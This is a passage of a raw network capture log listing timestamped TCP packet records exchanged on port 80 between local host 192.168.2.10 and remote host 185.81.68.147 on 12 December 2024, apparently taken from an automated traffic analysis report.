                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.983247995 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.983280897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.983423948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.983423948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.986552954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.986588955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.986733913 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.989856958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.989970922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.990107059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.993103027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.993128061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:42.993271112 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.090858936 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.090935946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.091125011 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.092338085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.092379093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.092504978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.095077991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.095141888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.095284939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.097734928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.097795010 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.097914934 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.100594997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.100694895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.100831985 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.103883028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.104024887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.104403019 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.106050968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.106188059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.106309891 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.108675957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.108767033 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.109093904 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.111207008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.111294031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.111411095 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.113725901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.113801003 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.113929033 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.116204023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.116285086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.116425991 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.118627071 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.118648052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.118786097 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.121040106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.121140957 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.121274948 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.123425007 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.123485088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.123625040 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.125799894 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.125844002 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.125987053 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.128160954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.128262997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.128393888 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.130548954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.130712986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.130870104 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.132929087 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.133049965 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.133183956 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.135394096 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.135421991 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.135559082 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.137737989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.137768030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.137901068 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.140120983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.140218019 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.140342951 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.142503023 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.142601013 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.142718077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.144870043 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.144995928 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.145757914 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.147263050 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.147353888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.147455931 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.149661064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.149775028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.150007963 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.152297974 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.152338028 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.152467966 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.154448986 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.154612064 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.155780077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.156903982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.156939983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.157020092 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.159296989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.159390926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.159502029 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.161614895 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.161712885 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.161844969 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.164011955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.164108038 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.164230108 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.166368008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.166428089 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.167742014 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.168812990 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.168922901 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.171211004 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.171266079 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.171356916 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.171372890 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.173578024 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.173707008 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.173851013 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.175952911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.176135063 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.176270008 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.178339958 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.178541899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.179667950 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.180926085 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.180972099 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.183233976 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.183290005 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.184292078 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.185664892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.185717106 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.185724020 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.185751915 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.188019037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.188169956 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.188224077 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.190325022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.190435886 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.190496922 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.192689896 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.192781925 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.192842007 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.195152998 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.195276022 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.195666075 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.197518110 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.197581053 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.197621107 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.199903011 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.200010061 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.200051069 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.202328920 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.202398062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.202440977 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.204685926 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.204807997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.204849958 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.207041025 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.207148075 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.207190037 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.209438086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.209536076 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.209583998 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.211847067 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.211913109 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.211956024 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.214241982 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.259737015 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.283242941 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.283373117 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.283514023 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.284120083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.284257889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.284359932 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.286118031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.286248922 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.286307096 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.288099051 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.288144112 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.288249016 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.290014029 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.290131092 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.290185928 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.291949034 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.292108059 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.292203903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.293843031 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.293962955 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.294022083 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.295763969 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.295905113 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.296003103 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.297784090 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.297904968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.297982931 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.299374104 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.299438953 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.299506903 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.301196098 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.301290989 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.301395893 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.302979946 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.303006887 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.303056955 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.304743052 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.304826975 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.304940939 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.306577921 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.306631088 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.306740999 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.308275938 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.308379889 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.308497906 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.310067892 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.310081959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.310152054 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.311728954 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.311816931 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.311927080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.313345909 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.313400030 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.313456059 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.315085888 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.315109968 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.315164089 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.316703081 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.316756964 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.316860914 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.318263054 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.318309069 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.318373919 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.319884062 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.319974899 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.320079088 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.321516037 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.321614027 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.321717978 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.323062897 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.323167086 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.323216915 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.324635983 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.324729919 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.324837923 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.326255083 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.326303959 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.326358080 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.327837944 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.327997923 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.328118086 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.329428911 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.329536915 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.329633951 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.330878973 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.331001997 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.331052065 CET4994680192.168.2.10185.81.68.147
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.332434893 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.332477093 CET8049946185.81.68.147192.168.2.10
                                                                                                                                                                                                                                                                                        Dec 12, 2024 16:48:43.332525015 CET4994680192.168.2.10185.81.68.147
